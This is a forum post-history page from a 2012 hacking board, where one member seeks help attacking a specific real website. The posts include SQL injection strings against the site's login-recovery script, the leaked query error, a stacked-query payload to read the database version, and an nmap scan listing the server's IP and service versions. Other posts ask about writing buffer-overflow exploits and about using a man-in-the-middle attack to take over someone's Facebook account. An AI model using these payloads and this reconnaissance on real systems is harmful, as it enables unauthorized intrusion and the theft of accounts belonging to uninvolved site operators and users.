Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - fr0wnR

Pages: [1]
1
Hacking and Security / Re: Site injectable?
« on: December 10, 2012, 08:08:53 pm »
Thank you for the nice explanation!
How did you find out which keywords are getting filtered out? Just trying or software?
And yeah, the whole software set is old on their server.
Quote
Starting Nmap 5.00 ( http://nmap.org ) at 2012-12-02 22:48 CET
 Interesting ports on 69.36.8.247:
 Not shown: 976 closed ports
 PORT STATE SERVICE VERSION
 21/tcp open ftp ProFTPD 1.3.3c
 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
 25/tcp open smtp Courier smtpd
 26/tcp open smtp Courier smtpd
 53/tcp open domain ISC BIND 9.2.4
 80/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
 110/tcp open pop3 Courier pop3d
 135/tcp filtered msrpc
 139/tcp filtered netbios-ssn
 143/tcp open imap Courier Imapd (released 2010)
 443/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
 445/tcp filtered microsoft-ds
 587/tcp open smtp Courier smtpd
 993/tcp open ssl/imaps?
 995/tcp open ssl/pop3s?
 3000/tcp open http ServerCP httpd
 3001/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
 3306/tcp open mysql MySQL 5.0.91-community
 4321/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
 5432/tcp open postgresql PostgreSQL DB
 6666/tcp filtered irc
 6667/tcp filtered irc
 6668/tcp filtered irc
 6669/tcp filtered irc
 Service Info: Host: server2.tantrix.com; OS: Unix


Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 30.78 seconds


2
Hacking and Security / Re: Site injectable?
« on: December 10, 2012, 07:37:51 pm »
Wait this is genius  :D
They have MySQL 5.0.91-community.
Will read through the changes, thank you!

3
Hacking and Security / Re: Site injectable?
« on: December 10, 2012, 07:02:50 pm »
Quote from: ande on December 10, 2012, 06:44:33 pm
Forbidden pages usually means some sort of filtering. Tried @@vErSion? :)
Hmm, doesnt work either..
I will try encoding it, but I dont think this will change anything.
Is it really not injectable??

4
Hacking and Security / Site injectable?
« on: December 10, 2012, 06:26:34 pm »
www.tantrix.com/cgi-bin/forgot_name.cgi?pname='or 1=1; --
This works, I'm getting a sql error:
Quote
Error SELECT uid,player_name,e_mail,country,date_joined FROM players where player_name like '%'or 1=1-%' ORDER BY date_joined DESC: (67.159.36.26 /cgi-bin/forgot_name.cgi?pname='or%201=1- : execute) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' ORDER BY date_joined DESC' at line 1


Now I'm trying to get e.g. the version (with @@version), but then I'm getting to a forbidden page. Does this simply mean that its not injectable or am I doing something wrong?


This would be my idea with @@version:
Quote
tantrix.com/cgi-bin/forgot_name.cgi?pname=test%'; SELECT @@version; --
Quote
The SQL query then:
SELECT uid,player_name,e_mail,country,date_joined FROM players where player_name like '%test%'; SELECT @@version; -- the rest commented out




5
Hacking and Security / Win7 to write exploits
« on: November 18, 2012, 01:28:42 pm »
On which OS do you write your exploits (e.g. for a Filezilla Server or in general windows applications)?
I started to try out some tutorials about writing exploits, but on Windows 7, and i cant figure it out to exploit a Buffer Overflow Vuln. Is this because of the ASLR thingy on win7 or am i just too stupid?
This is the tutorial: https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

6
Hacking and Security / Re: mitm attack only local?
« on: July 10, 2012, 07:21:34 pm »
What about sslstrip? I didnĀ“t try it, but I think it can sniff out passwords with ssl encryption..?

7
Hacking and Security / Re: mitm attack only local?
« on: July 10, 2012, 06:49:23 am »
Thanks guys, will tell him!

8
Hacking and Security / mitm attack only local?
« on: July 10, 2012, 01:04:53 am »
is it possible to use something like a mitm attack not only on the local network, but also over the internet? a friend thinks he could hack a facebook account with a mitm attack, but without being in the same network..  :o  so is this possible?

Pages: [1]